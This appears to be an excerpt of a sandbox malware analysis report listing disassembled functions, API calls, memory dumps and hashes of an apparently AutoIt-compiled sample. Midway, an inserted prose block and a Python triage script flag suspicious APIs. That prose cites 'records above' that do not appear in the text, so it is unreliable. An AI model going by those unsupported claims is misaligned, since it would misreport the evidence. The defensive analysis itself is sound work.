               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: 0&z
              • API String ID: 0-2820941700
              • Opcode ID: d13d7ad5f396863204dd0080da75ade720c532cb8c51b8f80897acd95b46c113
              • Instruction ID: 78fa2d245e396c6b82c44dd04dae84c5b4ab51d1a6adbcccf999210eff2e8e03
              • Opcode Fuzzy Hash: d13d7ad5f396863204dd0080da75ade720c532cb8c51b8f80897acd95b46c113
              • Instruction Fuzzy Hash: BD21E7323216118BD728CF79C82367E73E5A794310F148A2EE4A7C37D1DE3AA905CB84
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9c2066cb2894a89233c51479eac4db81d8b812cabec05727c6e5fca42b3365f
              • Instruction ID: 381d433856c0a6ee5eb19534b33c23f731c6521d023dbd8b145d0cc7e36860a5
              • Opcode Fuzzy Hash: a9c2066cb2894a89233c51479eac4db81d8b812cabec05727c6e5fca42b3365f
              • Instruction Fuzzy Hash: 9D32F221D29F418DD7279634CC22335A689AFB73C5F15D737E82AB59AAEB2DD4C38100
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5e82e2b8fff1fdea07d106e46cdf284e001a0bed0978d97c4c53d528e9ae46c9
              • Instruction ID: aaca0146c2dc89ad00afd5e2e1306f3546f902c4b8fff4ad2527d53b354d3168
              • Opcode Fuzzy Hash: 5e82e2b8fff1fdea07d106e46cdf284e001a0bed0978d97c4c53d528e9ae46c9
              • Instruction Fuzzy Hash: FA323931A002A58BDF26CF29E490ABD77B2EF55310F38816AE449DB391D63CDD82DB51
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38307b4a995edd1488a96a089108ad0dd93fb178de2c66cd9a34e98ec2e82bb7
              • Instruction ID: a7fd4614074684c2e14e2281b999083a289a15b8dd61a8c58ccfec64ab8c6b87
              • Opcode Fuzzy Hash: 38307b4a995edd1488a96a089108ad0dd93fb178de2c66cd9a34e98ec2e82bb7
              • Instruction Fuzzy Hash: A7229F70E04609DFDF18CF68C881AEEB7B6FF44300F14462AE816A7391EB39A955CB55
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f6643be563c8d9a2d64094b509f957a7733ccbcbf8b5dc94b651717884302cc
              • Instruction ID: 019e2c88f922e2e323763c35d3a9862419e3fe54cc70df31c9e81240140fddc2
              • Opcode Fuzzy Hash: 0f6643be563c8d9a2d64094b509f957a7733ccbcbf8b5dc94b651717884302cc
              • Instruction Fuzzy Hash: 7E02A6B1E0020AEBDB14DF58D881AADB7B2FF44300F118169E8569B3D1EB35EE51CB95
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4a27130f7ea7df12b1d90b501ae831a013f3873148f0a08b9036079981984457
              • Instruction ID: 6834b538051ee04cdaa27bc7852b169284fef0925481475f05999aaa2a527a22
              • Opcode Fuzzy Hash: 4a27130f7ea7df12b1d90b501ae831a013f3873148f0a08b9036079981984457
              • Instruction Fuzzy Hash: 5461677120C70E9AEE749E2C8D95BFE2397DF52704F10095EEB42DB381DA51AE42C319
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
              • Instruction ID: d5eafcdf902b49c7eb14c066e91c0c783ad7d0f43893108c38a5c24e302125fa
              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
              • Instruction Fuzzy Hash: 2541C471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB80
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
              • Instruction ID: 38e298594a109dff80164791ffdc0c1ffe295c91b60008b0942cd833bed0035f
              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
              • Instruction Fuzzy Hash: 1B01A478A00109EFCB84DF98C5909AEF7F5FF48710F208599D819AB741D730AE41DB80
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
              • Instruction ID: 6cea9cd6e78fdb919727003c431d182a98f5e6932c28420d0ba700e58623b8dc
              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
              • Instruction Fuzzy Hash: 13019278A00109EFCB85DF98C5909AEF7F5FB48710F208599D809AB701D734AE41DB80
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
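The records above pair each lifted function with its imported APIs (BlockInput at 0074EABD, AdjustTokenPrivileges at 007310D4, SendInput/keybd_event at 0073B25D, GetUserNameW at 0072D28C) and with the memory dump it came from; the last four records come from 015C0000, which the plugin reports as "based on PE: false", i.e. code that is not backed by a PE image on disk. The script below is an added triage example, not code from the Joe Sandbox report or from the sample: it parses this record format and flags functions by an assumed API watchlist and by non-PE-backed origin. Assumptions: the WATCHLIST tags and NON_PE_TAG wording are chosen for the example; every record is taken to end with an "Instruction Fuzzy Hash" line, as on this page; SAMPLE_REPORT is constructed from four of the records shown here, trimmed to the fields the parser uses. Since this binary is flagged as a compiled AutoIt script and the AutoIt runtime implements built-ins such as BlockInput() and Send() on top of exactly these APIs, a watchlist hit in the 006D0000 module shows the interpreter carries the capability, not that this particular script calls it; the non-PE-backed region is the better place to look for the unpacked payload.

```python
"""Triage of Joe Sandbox "IDA Plugin" function records (added example, not report code)."""
import re
from dataclasses import dataclass, field

# Assumed watchlist for this example: imported API name -> short tag.
WATCHLIST = {
    "BlockInput": "blocks mouse/keyboard input (anti-debug)",
    "AdjustTokenPrivileges": "adjusts token privileges",
    "SendInput": "synthesizes user input",
    "keybd_event": "synthesizes user input",
    "GetUserNameW": "reads user name (host fingerprinting)",
}
NON_PE_TAG = "code in memory not backed by a PE image (unpacked/injected?)"

# "• Name.MODULE(args), ref: ADDR"  or  "• Name.MODULE ref: ADDR"
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"Offset:\s*(?P<off>\w+),\s*based on PE:\s*(?P<pe>true|false)")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (name, module, ref)
    offset: str = ""                             # dump base the function came from
    pe_backed: bool = True                       # "based on PE: true/false"
    fields: dict = field(default_factory=dict)   # API ID, Opcode ID, hashes, ...


def parse_records(text):
    """Split report text into FunctionRecords; the 'Instruction Fuzzy Hash'
    line that closes every record (assumed, as on this page) is the terminator."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif line.startswith("•") and section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append((m["name"], m["module"], m["ref"].upper()))
        elif line.startswith("•") and section in ("Memory Dump Source", "Similarity"):
            key, _, value = (p.strip() for p in line.lstrip("•").partition(":"))
            if key == "Source File" and (m := SOURCE_RE.search(line)):
                cur.offset, cur.pe_backed = m["off"].upper(), m["pe"] == "true"
            elif key != "Associated":            # sibling dumps: not needed here
                cur.fields[key] = value
            if key == "Instruction Fuzzy Hash":  # last field of every record
                records.append(cur)
                cur, section = FunctionRecord(), None
    return records


def triage(text):
    """One finding per flagged function: address (first API ref, else dump
    offset), the record's API ID, PE backing and the matched tags."""
    findings = []
    for rec in parse_records(text):
        tags = sorted({WATCHLIST[n] for n, _, _ in rec.apis if n in WATCHLIST})
        if not rec.pe_backed:
            tags.append(NON_PE_TAG)
        if tags:
            findings.append({"where": rec.apis[0][2] if rec.apis else rec.offset,
                             "api_id": rec.fields.get("API ID", ""),
                             "pe_backed": rec.pe_backed, "tags": tags})
    return findings


# Constructed sample: four records in the page's format, trimmed to the
# fields the parser uses; dump names and offsets are those of this report.
SAMPLE_REPORT = """
APIs
• BlockInput.USER32(00000001), ref: 0074EABD
Memory Dump Source
• Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
Similarity
• API ID: BlockInput
• Instruction Fuzzy Hash: 11E01A312002059F
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007311FC), ref: 007310D4
• CloseHandle.KERNEL32(?,?,007311FC), ref: 007310E9
Memory Dump Source
• Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• Instruction Fuzzy Hash: 08E04F32008740AF
APIs
• GetLastError.KERNEL32(00000000), ref: 007437E4
• FormatMessageW.KERNEL32(00001000,00000000,?), ref: 007437F4
Memory Dump Source
• Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
Similarity
• API ID: ErrorFormatLastMessage
• Instruction Fuzzy Hash: 7CF0E5B06053286A
Memory Dump Source
• Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Similarity
• API ID:
• Instruction Fuzzy Hash: 2541C471D1051CDB
"""
```

Running triage(SAMPLE_REPORT) yields three findings: the BlockInput stub at 0074EABD, the AdjustTokenPrivileges stub at 007310D4, and the function at 015C0000 flagged only for living in non-PE-backed memory; the GetLastError/FormatMessageW record is benign under the watchlist and is dropped. To run it on the real report, paste the whole function listing into the text argument; the parser ignores the headers, "Associated" lines and any text outside the records.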
              APIs
              • DeleteObject.GDI32(00000000), ref: 00752B30
              • DeleteObject.GDI32(00000000), ref: 00752B43
              • DestroyWindow.USER32 ref: 00752B52
              • GetDesktopWindow.USER32 ref: 00752B6D
              • GetWindowRect.USER32(00000000), ref: 00752B74
              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00752CA3
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00752CB1
              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752CF8
              • GetClientRect.USER32(00000000,?), ref: 00752D04
              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00752D40
              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D62
              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D75
              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D80
              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D89
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D98
              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752DA1
              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752DA8
              • GlobalFree.KERNEL32(00000000), ref: 00752DB3
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752DC5
              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0076FC38,00000000), ref: 00752DDB
              • GlobalFree.KERNEL32(00000000), ref: 00752DEB
              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00752E11
              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00752E30
              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752E52
              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0075303F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
              • String ID: $AutoIt v3$DISPLAY$static
              • API String ID: 2211948467-2373415609
              • Opcode ID: f5595ed05157340c7329c10a2d959f1f58b19d3bff0d5c2eab9e6e32c35dd2e4
              • Instruction ID: 14c82aa4abbbfd0fa01d2a284d004b6a8ef68a0de11b8e12991e8fc07b1321b2
              • Opcode Fuzzy Hash: f5595ed05157340c7329c10a2d959f1f58b19d3bff0d5c2eab9e6e32c35dd2e4
              • Instruction Fuzzy Hash: 89029F71900209EFDB15DF64DC89EAE7BB9FB49311F008109F915AB2A1DBB8AD05CF64
              APIs
              • SetTextColor.GDI32(?,00000000), ref: 0076712F
              • GetSysColorBrush.USER32(0000000F), ref: 00767160
              • GetSysColor.USER32(0000000F), ref: 0076716C
              • SetBkColor.GDI32(?,000000FF), ref: 00767186
              • SelectObject.GDI32(?,?), ref: 00767195
              • InflateRect.USER32(?,000000FF,000000FF), ref: 007671C0
              • GetSysColor.USER32(00000010), ref: 007671C8
              • CreateSolidBrush.GDI32(00000000), ref: 007671CF
              • FrameRect.USER32(?,?,00000000), ref: 007671DE
              • DeleteObject.GDI32(00000000), ref: 007671E5
              • InflateRect.USER32(?,000000FE,000000FE), ref: 00767230
              • FillRect.USER32(?,?,?), ref: 00767262
              • GetWindowLongW.USER32(?,000000F0), ref: 00767284
                • Part of subcall function 007673E8: GetSysColor.USER32(00000012), ref: 00767421
                • Part of subcall function 007673E8: SetTextColor.GDI32(?,?), ref: 00767425
                • Part of subcall function 007673E8: GetSysColorBrush.USER32(0000000F), ref: 0076743B
                • Part of subcall function 007673E8: GetSysColor.USER32(0000000F), ref: 00767446
                • Part of subcall function 007673E8: GetSysColor.USER32(00000011), ref: 00767463
                • Part of subcall function 007673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00767471
                • Part of subcall function 007673E8: SelectObject.GDI32(?,00000000), ref: 00767482
                • Part of subcall function 007673E8: SetBkColor.GDI32(?,00000000), ref: 0076748B
                • Part of subcall function 007673E8: SelectObject.GDI32(?,?), ref: 00767498
                • Part of subcall function 007673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007674B7
                • Part of subcall function 007673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007674CE
                • Part of subcall function 007673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007674DB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
              • String ID:
              • API String ID: 4124339563-0
              • Opcode ID: e679133389053e40739a3b6ed7e48c308c845f9dd4765d4aa0c3ca1af43bba65
              • Instruction ID: 4b0e5bbc4b233345bf4b39c2bd8dd3a77010c4f2737830aa4d694ecc755e83cf
              • Opcode Fuzzy Hash: e679133389053e40739a3b6ed7e48c308c845f9dd4765d4aa0c3ca1af43bba65
              • Instruction Fuzzy Hash: F6A1C172008305EFDB069F60DC48E6B7BA9FF89364F104A19F9A3961E1D7B8E844CB55
              APIs
              • DestroyWindow.USER32(?,?), ref: 006E8E14
              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00726AC5
              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00726AFE
              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00726F43
                • Part of subcall function 006E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006E8BE8,?,00000000,?,?,?,?,006E8BBA,00000000,?), ref: 006E8FC5
              • SendMessageW.USER32(?,00001053), ref: 00726F7F
              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00726F96
              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00726FAC
              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00726FB7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
              • String ID: 0
              • API String ID: 2760611726-4108050209
              • Opcode ID: 3f420435c19c67cce9ef405d329a357a3800991e6031a5731dfce5f5256c87bd
              • Instruction ID: c724ab0eb826f205c56a2924846857079c5eaca632d4beb3d7aa03b8300cf4ff
              • Opcode Fuzzy Hash: 3f420435c19c67cce9ef405d329a357a3800991e6031a5731dfce5f5256c87bd
              • Instruction Fuzzy Hash: AB12DE306012A1DFDB25DF24E844BB6B7E2FB45300F54846AF5898B261CB39EC92DF95
              APIs
              • DestroyWindow.USER32(00000000), ref: 0075273E
              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0075286A
              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007528A9
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007528B9
              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00752900
              • GetClientRect.USER32(00000000,?), ref: 0075290C
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00752955
              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00752964
              • GetStockObject.GDI32(00000011), ref: 00752974
              • SelectObject.GDI32(00000000,00000000), ref: 00752978
              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00752988
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00752991
              • DeleteDC.GDI32(00000000), ref: 0075299A
              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007529C6
              • SendMessageW.USER32(00000030,00000000,00000001), ref: 007529DD
              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00752A1D
              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00752A31
              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00752A42
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00752A77
              • GetStockObject.GDI32(00000011), ref: 00752A82
              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00752A8D
              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00752A97
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
              • API String ID: 2910397461-517079104
              • Opcode ID: d18e94631bf90796df279ce995486a89449f235ee8da0f223f79b8259d6598ab
              • Instruction ID: 3b431d28ec751e0e2ab31efd205dc064d2ec17bd1ac2c34280db8d5a36c3aeaa
              • Opcode Fuzzy Hash: d18e94631bf90796df279ce995486a89449f235ee8da0f223f79b8259d6598ab
              • Instruction Fuzzy Hash: 6EB19FB1A00215AFEB14DFA8DC45FAE7BA9EB49711F008115F915E7291D7B8ED00CF98
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 00744AED
              • GetDriveTypeW.KERNEL32(?,0076CB68,?,\\.\,0076CC08), ref: 00744BCA
              • SetErrorMode.KERNEL32(00000000,0076CB68,?,\\.\,0076CC08), ref: 00744D36
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorMode$DriveType
              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
              • API String ID: 2907320926-4222207086
              • Opcode ID: 529dcb761114f399433c4dfc1f8dca62882209177102c791c74b0f918ba0c289
              • Instruction ID: 3a58bc7a985b63cb0183a992cc02bb70f01550bdfcd92e2eeda452b9ffbda9ef
              • Opcode Fuzzy Hash: 529dcb761114f399433c4dfc1f8dca62882209177102c791c74b0f918ba0c289
              • Instruction Fuzzy Hash: 7E61AFB0B05205DBCF04DF24DAD2A78B7B1EB05341B28851AF806AB691DB3DED41FB65
              APIs
